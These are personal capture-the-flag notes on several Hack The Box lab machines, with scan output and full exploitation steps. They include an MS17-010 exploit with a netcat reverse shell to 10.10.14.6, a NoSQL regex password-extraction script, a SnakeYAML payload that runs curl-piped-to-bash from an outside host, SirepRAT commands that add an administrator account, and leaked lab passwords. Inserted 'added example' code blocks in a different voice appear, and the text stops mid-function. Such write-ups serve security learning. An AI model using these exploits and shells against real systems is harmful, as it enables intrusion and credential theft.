    |_sslv2: ERROR: Script execution failed (use -d to debug)
    |_ssl-date: ERROR: Script execution failed (use -d to debug)
    |_pop3-capabilities: PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE TOP RESP-CODES UIDL APOP USER STLS LOGIN-DELAY(0) EXPIRE(NEVER)
    |_ssl-cert: ERROR: Script execution failed (use -d to debug)
    |_tls-alpn: ERROR: Script execution failed (use -d to debug)
    |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
    111/tcp   open  rpcbind    2 (RPC #100000)
    | rpcinfo:
    |   program version    port/proto  service
    |   100000  2            111/tcp   rpcbind
    |   100000  2            111/udp   rpcbind
    |   100024  1            875/udp   status
    |_  100024  1            878/tcp   status
    143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_tls-alpn: ERROR: Script execution failed (use -d to debug)
    |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
    |_ssl-cert: ERROR: Script execution failed (use -d to debug)
    |_imap-capabilities: ANNOTATEMORE IMAP4rev1 URLAUTHA0001 OK X-NETSCAPE Completed BINARY UIDPLUS IMAP4 NAMESPACE IDLE LIST-SUBSCRIBED MAILBOX-REFERRALS UNSELECT LISTEXT ID SORT=MODSEQ CATENATE RENAME THREAD=REFERENCES QUOTA NO THREAD=ORDEREDSUBJECT ACL CONDSTORE SORT ATOMIC MULTIAPPEND CHILDREN STARTTLS RIGHTS=kxte LITERAL+
    |_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
    |_ssl-date: ERROR: Script execution failed (use -d to debug)
    |_sslv2: ERROR: Script execution failed (use -d to debug)
    443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
    | Not valid before: 2017-04-07T08:22:08
    |_Not valid after:  2018-04-07T08:22:08
    |_ssl-date: 2021-10-20T20:32:50+00:00; +15s from scanner time.
    |_http-server-header: Apache/2.2.3 (CentOS)
    | http-robots.txt: 1 disallowed entry
    |_/
    |_http-title: Elastix - Login page
    878/tcp   open  status     1 (RPC #100024)
    993/tcp   open  ssl/imap   Cyrus imapd
    |_imap-capabilities: CAPABILITY
    995/tcp   open  pop3       Cyrus pop3d
    |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
    |_ssl-known-key: ERROR: Script execution failed (use -d to debug)
    |_tls-alpn: ERROR: Script execution failed (use -d to debug)
    |_ssl-date: ERROR: Script execution failed (use -d to debug)
    |_ssl-cert: ERROR: Script execution failed (use -d to debug)
    |_sslv2: ERROR: Script execution failed (use -d to debug)
    4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
    4445/tcp  open  upnotifyp?
    4559/tcp  open  hylafax    HylaFAX 4.3.10
    5038/tcp  open  asterisk   Asterisk Call Manager 1.1
    10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
    
  • port 3306 (MySQL)

    • connecting with nc only returns: Host '10.10.14.6' is not allowed to connect to this MySQL server
  • port 110 (POP3)

    • let's see if we can read mail: Cyrus POP3 v2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
  • port 10000 (Webmin)

    • another admin page
  • port 5038 (Asterisk manager)

    • maybe it's exploitable?
    • https://github.com/EnableSecurity/sipvicious
    $ svmap  10.10.10.7
    +-----------------+---------------------+
    | SIP Device      | User Agent          |
    +=================+=====================+
    | 10.10.10.7:5060 | FPBX-2.8.1(1.8.7.0) |
    +-----------------+---------------------+
    
    svwar 10.10.10.7 -p
    
    

Machine Blue - Easy - Windows

PORT      STATE SERVICE      REASON
135/tcp   open  msrpc        syn-ack ttl 127
139/tcp   open  netbios-ssn  syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49155/tcp open  unknown      syn-ack ttl 127
49156/tcp open  unknown      syn-ack ttl 127
49157/tcp open  unknown      syn-ack ttl 127
Host script results:
| smb2-time:
|   date: 2021-10-21T15:07:21
|_  start_date: 2021-10-21T15:04:53
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-10-21T16:07:24+01:00
|_clock-skew: mean: -19m40s, deviation: 34m36s, median: 17s

$ nmap -p445 --script smb-vuln-\* 10.10.10.40

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND

let's clone the exploit https://github.com/worawit/MS17-010 and run its checker:

 python2 checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

denied, but nmap got in as guest… checker.py authenticates with the USERNAME/PASSWORD set at the top of the script, so set USERNAME to guest and try again:

 python2 checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

now that the checker says the named pipes are reachable, let's exploit it through the samr pipe!

python2 zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa800460c950
SESSION: 0xfffff8a003437060
FLINK: 0xfffff8a0035f4088
InParam: 0xfffff8a0035ee15c
MID: 0x3503
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done

okay… we created a file… let's get a reverse shell instead. The smb_pwn() function at the bottom of the exploit creates the file, and the commented-out service_exec() call next to it runs a command as SYSTEM instead.

We can host nc.exe on an SMB share of our own and have that command run it:

  1. download nc.exe from https://github.com/int0x33/nc.exe/
  2. serve the current directory as an SMB share: sudo smbserver.py -smb2support -ip 0.0.0.0 kzk $(pwd)
  3. open a netcat listener: sudo nc -nvlp 443
  4. change the exploit to run the nc from our share: service_exec(conn, r'\\10.10.14.6\kzk\nc.exe -e cmd.exe 10.10.14.6 443')
  5. run the exploit: python2 zzz_exploit.py 10.10.10.40 samr

Machine Mango - Medium - Linux

PORT    STATE SERVICE REASON
22/tcp  open  ssh     syn-ack ttl 63
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.32 seconds
           Raw packets sent: 65563 (2.885MB) | Rcvd: 65535 (2.621MB)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
| tls-alpn:
|_  http/1.1
|_http-title: Mango | Search Base
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.55 seconds

the certificate's CN gives us a vhost, staging-order.mango.htb (add it to /etc/hosts)

  • we have two sites, one on 443 and another on 80

  • port 80 (staging-order.mango.htb):

    • it shows a login portal…
    • gobuster
      • vendor/ << probably a Composer vendor directory (PHP dependencies)
    • looked for other vhosts…
      • nothing
  • port 443: the Mango search page

  • HINT :( - NoSQL injection in the port-80 login

    • wrote a simple python script to extract the admin password one character at a time, using the $regex operator on the password field (a matching prefix logs in, a non-matching one does not):
import re
import string

import requests

URL = "http://staging-order.mango.htb"   # vhost from the certificate, resolved through /etc/hosts
current = ""

for i in range(20):
    for c in string.printable:
        if c.isspace():
            continue
        # $regex is PCRE on the server side: escape the candidate so metacharacters
        # in the password ({, ], ?, ...) are matched literally
        r = requests.post(URL, data={
            "username": "admin",
            "password[$regex]": "^" + re.escape(current + c),
        })
        # a successful login renders a different page; "farming" only appears there
        if "farming" in r.text:
            current += c
            print(current)
            break
    else:
        break   # no character extended the prefix: password complete (or charset exhausted)

print(current)

or use the Nosql-MongoDB-injection-username-password-enumeration tool, which found the password t9KcS3>!0B#2 and also two users, admin and mango:

2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
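The extraction loop generalised, as an added example rather than the page's script: the login endpoint is modelled by a local oracle that applies the injected $regex to a stored password the way MongoDB would (prefix test with ^), every candidate character is escaped with re.escape so passwords full of regex metacharacters ({, ], >, !) such as the two found on Mango extract cleanly, and the end of the password is confirmed with an anchored ^...$ match instead of assuming a fixed length. The user table is constructed from the two passwords the page recovered; nothing here talks to the network.

```python
import re
import string

# Constructed stand-in for the Mango backend: the real one feeds the POST body
# straight into a MongoDB query, so {"password": {"$regex": "^t9"}} is a prefix test.
FAKE_USERS = {"admin": "t9KcS3>!0B#2", "mango": "h3mXK8RhU~f{]f5H"}

# Printable ASCII without whitespace; passwords with other characters need a wider set.
CHARSET = string.ascii_letters + string.digits + string.punctuation


class LoginOracle:
    """True when the regex matches the stored password, i.e. the login 'succeeds'.
    Counts queries so the cost of the attack (roughly len(password) * len(CHARSET)/2) is visible."""

    def __init__(self, users=FAKE_USERS):
        self.users = users
        self.queries = 0

    def __call__(self, username: str, password_regex: str) -> bool:
        self.queries += 1
        stored = self.users.get(username)
        return stored is not None and re.search(password_regex, stored) is not None


def extract_password(username: str, oracle, charset: str = CHARSET, max_len: int = 64) -> str:
    """Blind, character-by-character recovery through the $regex operator."""
    current = ""
    while len(current) < max_len:
        for c in charset:
            if oracle(username, "^" + re.escape(current + c)):
                current += c
                break
        else:
            # nothing extends the prefix: either we have the whole password or the
            # next character is outside charset. Distinguish with an anchored match.
            if oracle(username, "^" + re.escape(current) + "$"):
                return current
            raise RuntimeError("no character in charset extends %r; widen charset" % current)
    raise RuntimeError("password longer than max_len=%d" % max_len)


if __name__ == "__main__":
    oracle = LoginOracle()
    for user in FAKE_USERS:
        print(user, extract_password(user, oracle), "queries so far:", oracle.queries)
```

Against the real target the oracle is a requests.post with "password[$regex]" as the field name and a check on the response, exactly as in the page's script; re.escape's backslashes are valid PCRE escapes, so the same regexes work server-side.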

let's try the passwords over SSH! we got a shell! …

  • there is a MongoDB inside

    • nothing interesting in it
  • the SUID search shows a bunch of files:

/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/at
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
  • HINT :( jjs (the Nashorn JavaScript shell shipped with the JDK) has SUID
    • with jjs I wrote a script that gives u+s to bash

Machine Ophiuchi - Medium - Linux

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • fuzz
    • test/ shows it is Tomcat/9.0.38
    • admin/ is the Tomcat manager
  • googling "yaml injection" gives lots of hits about SnakeYAML deserialization
    • using this payload in the "Parse YAML" form:
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["10.10.14.6:8000"]
  ]]
]

a big 500 error page shows:

Can't construct a java object for tag:yaml.org,2002:java.net.URL; exception=java.lang.reflect.InvocationTargetException
 in 'string', line 3, column 5:
        !!java.net.URL ["10.10.14.6:8000"]

so the input reaches SnakeYAML and it instantiates the classes we name (java.net.URL only failed because the string has no scheme): we are on the right track

Exploit YAML parsing (SnakeYAML)

let's clone https://github.com/artsploit/yaml-payload

modify AwesomeScriptEngineFactory to execute Runtime.getRuntime().exec("curl http://10.10.14.6:8000/script.sh | bash"); note that exec(String) does not go through a shell, so the pipe only works as exec(new String[]{"bash", "-c", "curl http://10.10.14.6:8000/script.sh | bash"})

compile the class and build the jar as the README says

create a script.sh with the bash reverse shell

serve the jar and script.sh on port 8000; now we can use the payload to execute things on the machine:

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://10.10.14.6:8000/yaml-payload.jar"]
  ]]
]

it failed because my Java compiler is too new: java.lang.UnsupportedClassVersionError: artsploit/AwesomeScriptEngineFactory has been compiled by a more recent version of the Java Runtime

using sdkman, I installed Java 8…

recompiled… it seemed to work, but I didn't get the reverse shell…

but I saw that the jar and the script.sh were requested

Yeeey! I have a shell as tomcat

from tomcat to admin

checked the tomcat-users.xml and found a password for admin password="whythereisalimit"

let’s try to ssh it… yey! we are admin!

from admin to …
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

cool, that's a bit trickier… the Go program only does its work when main.wasm returns the right value, so we have to understand the wasm and change the value it returns

reverse engineer a wasm

with wasm-decompile (from wabt) we can see the real code

export memory memory(initial: 16, max: 0);

global g_a:int = 1048576;
export global data_end:int = 1048576;
export global heap_base:int = 1048576;

table T_a:funcref(min: 1, max: 1);

export function info():int {
  return 0
}

now let's see if we can do something similar

on my computer I built another wasm whose info() returns 1 (to pass the condition), which makes the Go program execute a bash script I could hijack (running it from another directory, where I control the script)

with that, give suid to /bin/bash and finished!
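
The wasm rewrite described above, as an added example that is not the notes' own file: a Python script that hand-assembles a minimal WebAssembly module exporting info() with a chosen return value. It assumes, per the notes, that /opt/wasm-functions/index.go loads main.wasm from the working directory, calls the export named info and runs a bash script when the result is 1; the output file name and the LEB128 helpers are mine, and the memory, global and table entries of the original module are left out on the assumption that the Go side does not require them.

```python
#!/usr/bin/env python3
"""Hand-assemble a minimal wasm module: `export function info(): i32 { return N }`.

Added example for the Ophiuchi notes; the page's own main.wasm was produced
differently. Only the type, function, export and code sections are emitted.
"""
import sys


def uleb128(value: int) -> bytes:
    """Unsigned LEB128, used for section sizes, counts and indices."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value == 0:
            out.append(byte)
            return bytes(out)
        out.append(byte | 0x80)


def sleb128(value: int) -> bytes:
    """Signed LEB128, used for the i32.const immediate."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        done = (value == 0 and not byte & 0x40) or (value == -1 and byte & 0x40)
        out.append(byte if done else byte | 0x80)
        if done:
            return bytes(out)


def section(section_id: int, payload: bytes) -> bytes:
    """A wasm section is: id byte, payload size (uleb128), payload."""
    return bytes([section_id]) + uleb128(len(payload)) + payload


def build_info_module(return_value: int, export_name: str = "info") -> bytes:
    """Return a complete .wasm whose single exported function returns `return_value`."""
    magic = b"\x00asm" + b"\x01\x00\x00\x00"  # "\0asm" + version 1
    # type section (1): one functype 0x60 with 0 params and 1 result of i32 (0x7f)
    types = uleb128(1) + b"\x60" + uleb128(0) + uleb128(1) + b"\x7f"
    # function section (3): one function, using type index 0
    funcs = uleb128(1) + uleb128(0)
    # export section (7): name, kind 0x00 (function), function index 0
    name = export_name.encode()
    exports = uleb128(1) + uleb128(len(name)) + name + b"\x00" + uleb128(0)
    # code section (10): one body with no locals: i32.const <value> ; end
    body = uleb128(0) + b"\x41" + sleb128(return_value) + b"\x0b"
    code = uleb128(1) + uleb128(len(body)) + body
    return magic + section(1, types) + section(3, funcs) + section(7, exports) + section(10, code)


if __name__ == "__main__":
    # Assumed output name: index.go is taken to load main.wasm relative to its working directory.
    path = sys.argv[1] if len(sys.argv) > 1 else "main.wasm"
    with open(path, "wb") as fh:
        fh.write(build_info_module(1))
    print(f"wrote {path}")
```

Write main.wasm and the script the Go code invokes into a directory you control, cd there and run the sudo command; you can confirm the module with wasm-decompile, which should show `export function info():int { return 1 }`.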

Link to original

Machine - Omni - Easy - Windows - Abandoned

Machine - Omni - Easy - Windows - Abandoned

PORT      STATE SERVICE    REASON
135/tcp   open  msrpc      syn-ack ttl 127
5985/tcp  open  wsman      syn-ack ttl 127
8080/tcp  open  http-proxy syn-ack ttl 127
29817/tcp open  unknown    syn-ack ttl 127
29819/tcp open  unknown    syn-ack ttl 127
29820/tcp open  unknown    syn-ack ttl 127
PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.92%I=7%D=10/24%Time=61757393%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x
SF:04G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\
SF:xc9}\xc8O\x12");
  • 135
    • rpcdump send a lot of things
  • 5985 seems to be winrm port being open
    • But I don’t have any user/password
  • 8080
    • has a basic auth …
    • we could try to fuzz it…
      • 8080/FUZZ
      • 8080/FUZZ.asp
      • 8080/FUZZ.aspx
      • 8080/FUZZ.php
  • 29817
    • nothing on netcat
  • 29819
    • nc send a PING
  • 29820
    • nc send some weird chars

So after looking closely at the ports, it seems it's a Windows IoT Core device: ports 29817/29819/29820 belong to the Sirep test service, and SirepRAT abuses it to execute commands as SYSTEM without authentication https://github.com/SafeBreach-Labs/SirepRAT

since winrm is already open… I will create a new user

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net user kozko kozko /add"

and give it administration permission

 python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c net localgroup Administrators kozko /add"
 evil-winrm -i 10.10.10.204 -u kozko

didn't work :(

in port 8080 (the Windows Device Portal), now that we have a user, we can log in :)

with nc64.exe we got a shell

and in the folder c:\Data\Users\app there is a file user.txt with the following content. It is a PSCredential exported with Export-Clixml: the <SS> element is a DPAPI-protected SecureString, which only the user who exported it can decrypt on that machine (for example with Import-Clixml from a PowerShell session running as that user)

type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
    </Props>
  </Obj>
</Objs>
Link to original

Machine Sense - Easy - Linux

Machine Sense - Easy - Linux

PORT    STATE SERVICE REASON
80/tcp  open  http    syn-ack ttl 63
443/tcp open  https   syn-ack ttl 63

PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open  ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time

found in the changelog.txt

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

in 443:

000000061:   200        173 L    425 W      6689 Ch     "help"
000000171:   200        173 L    425 W      6690 Ch     "stats"
000000614:   200        173 L    425 W      6689 Ch     "edit"
000000679:   200        173 L    425 W      6692 Ch     "license"
000000706:   200        173 L    425 W      6691 Ch     "system"
000000764:   200        173 L    425 W      6691 Ch     "status"
000001469:   200        173 L    425 W      6689 Ch     "exec"
000002741:   200        173 L    425 W      6690 Ch     "graph"
000004492:   200        173 L    425 W      6691 Ch     "wizard"
000006268:   200        173 L    425 W      6688 Ch     "pkg"
000017049:   200        16 L     26 W       384 Ch      "xmlrpc"
000034780:   200        173 L    425 W      6691 Ch     "reboot"
000046785:   200        173 L    425 W      6695 Ch     "interfaces"
  • found a system-users.txt
####Support ticket###

Please create the following user


username: Rohit
password: company defaults

we can log in with rohit / pfsense (the pfSense default password)

now we know it is pfSense **2.1.3-RELEASE** (amd64)

there is an exploit for this version… we got root access just by running the exploit xD (the pfSense web GUI runs as root, so command injection in it lands directly as root)

Link to original

Machine - Book - Linux - Medium

Machine - Book - Linux - Medium

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
|   /admin/: Possible admin folder
|_  /admin/index.php: Possible admin folder
|_http-server-header: Apache/2.4.29 (Ubuntu)

fuzzing

  • could create a user for the normal portal
  • there is an /admin portal that doesn't allow creating users
  • in the page, as a normal user, I can upload things…
  • we have another user admin@book.htb
  • there is a place to send email… maybe we can do some xss
    • didn't work :(
  • sql injection (nope)
  • sql truncation: register with admin@book.htb padded with spaces past the width of the email column; the uniqueness check sees a different string, MySQL truncates the stored value back to the admin email, and the login lookup then matches the admin email with our password
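
The SQL truncation attack in the last bullet, modelled in Python as an added example (this is not the Book application's code and no database is needed). The column width VARCHAR(20), the non-strict SQL mode and the PAD SPACE collation are assumptions for the demonstration, not facts from the notes; MySQL 5.7 and later default to STRICT_TRANS_TABLES, where the INSERT would be rejected with "Data too long" instead of silently truncated.

```python
#!/usr/bin/env python3
"""Model of a SQL truncation attack against a registration form.

Added example: a pure-Python stand-in for the MySQL behaviour. Assumptions
not taken from the page: the email column is VARCHAR(20), the server is not
in STRICT mode (over-long values are silently cut instead of rejected), and
the collation is PAD SPACE (trailing spaces are ignored in comparisons).
"""

EMAIL_WIDTH = 20                 # assumed VARCHAR(20)
TARGET = "admin@book.htb"        # the existing admin account from the notes


def mysql_store(value: str, width: int = EMAIL_WIDTH) -> str:
    """Non-strict MySQL truncates a too-long string to the column width."""
    return value[:width]


def mysql_equal(a: str, b: str) -> bool:
    """PAD SPACE collations compare strings as if trailing spaces were absent."""
    return a.rstrip(" ") == b.rstrip(" ")


class UsersTable:
    def __init__(self):
        self.rows = []   # (email, password) tuples, constructed in-memory table

    def select_by_email(self, email: str) -> list:
        return [row for row in self.rows if mysql_equal(row[0], email)]

    def register(self, email: str, password: str) -> bool:
        # Application check on the *raw* input: "is this email taken?"
        if self.select_by_email(email):
            return False
        # INSERT: the stored value is whatever survives truncation.
        self.rows.append((mysql_store(email), password))
        return True

    def login(self, email: str, password: str) -> bool:
        # WHERE email = ? AND password = ? ; any matching row lets you in
        return any(p == password for _, p in self.select_by_email(email))


def craft_collision(target: str, width: int = EMAIL_WIDTH) -> str:
    """Pad the target past the column width and append a junk character.

    The junk char makes the uniqueness check miss, while the truncated
    INSERT drops it and leaves target + trailing spaces in the table.
    """
    return target + " " * (width - len(target)) + "x"


def run_attack() -> dict:
    db = UsersTable()
    db.register(TARGET, "Sup3r_S3cur3_P455")     # legitimate admin (password from the notes)
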